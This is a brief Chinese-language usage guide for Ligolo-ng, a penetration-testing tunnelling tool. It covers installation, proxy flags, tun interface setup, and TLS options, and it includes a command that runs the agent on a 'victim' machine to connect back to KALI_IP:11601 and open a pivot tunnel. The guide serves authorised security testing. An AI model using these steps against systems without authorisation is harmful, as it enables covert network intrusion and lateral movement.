隧道代理工具 - Ligolo-ng
介绍

Ligolo-ng是一款简单、轻量级且快速的工具,它允许渗透测试人员使用tun 接口从反向 TCP/TLS 连接建立隧道(无需 SOCKS)
项目地址:https://github.com/nicocha30/ligolo-ng
优势
- 使用简单
- 隧道接口(不再使用 SOCKS!)
- 支持多种平台(Linux、Windows、macOS)
- 高性能
- 不需要高权限
- 使用 Let's Encrypt 自动配置证书
攻击机(kali)需要有权限创建tun网卡接口,对于靶机来说,ligolo-ng不需要高权限即可运行
安装
预编译二进制文件
Github Releasehttps://github.com/nicocha30/ligolo-ng/releases获取最新预编译版本二进制文件(Windows/Linux/macOS/BSD)
kali存储库
Ligolo-ng 现在已默认包含在 Kali Linux 中,使用以下命令安装它:
apt install ligolo-ng
快速入门
帮助信息
# -laddr <addr> 监听地址,默认 0.0.0.0:11601
# -selfcert 生成自签名证书
# -certfile <cert> 指定证书文件
# -keyfile <key> 指定密钥文件
# -autocert 使用 Let's Encrypt 自动配置证书
# -config <file> 指定配置文件
./proxy [-laddr <addr>] [-selfcert] [-certfile <cert> -keyfile <key>] [-autocert] [-config <file>] [-v] [-daemon]
攻击机创建tun接口
sudo ip tuntap add mode tun ligolo
sudo ip link set ligolo up
攻击机(kali)启动 Ligolo-ng 代理服务器(默认端口 11601):
./proxy -h
# 使用自签名证书
./proxy -selfcert
# 忽略证书验证
./proxy -ignore-cert
# 使用 Let's Encrypt 自动配置证书
./proxy -autocert
在目标(受害者)计算机上启动代理(无需任何权限):
# linux
./agent -connect KALI_IP:11601 -ignore-cert
:: windows
.\agent.exe -connect KALI_IP:11601 -ignore-cert
目标机器启动代理后,攻击机会提示收到一个会话
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
- session 显示当前会话列表
- start 启动隧道
TLS选项
-autocert:代理会在代理连接时自动为attacker_c2_server.com请求证书(使用 Let's Encrypt)certfile/keyfile:使用自定义证书和密钥文件selfcert:自动生成并使用自签名证书ignore-cert:忽略证书验证,不考虑安全机制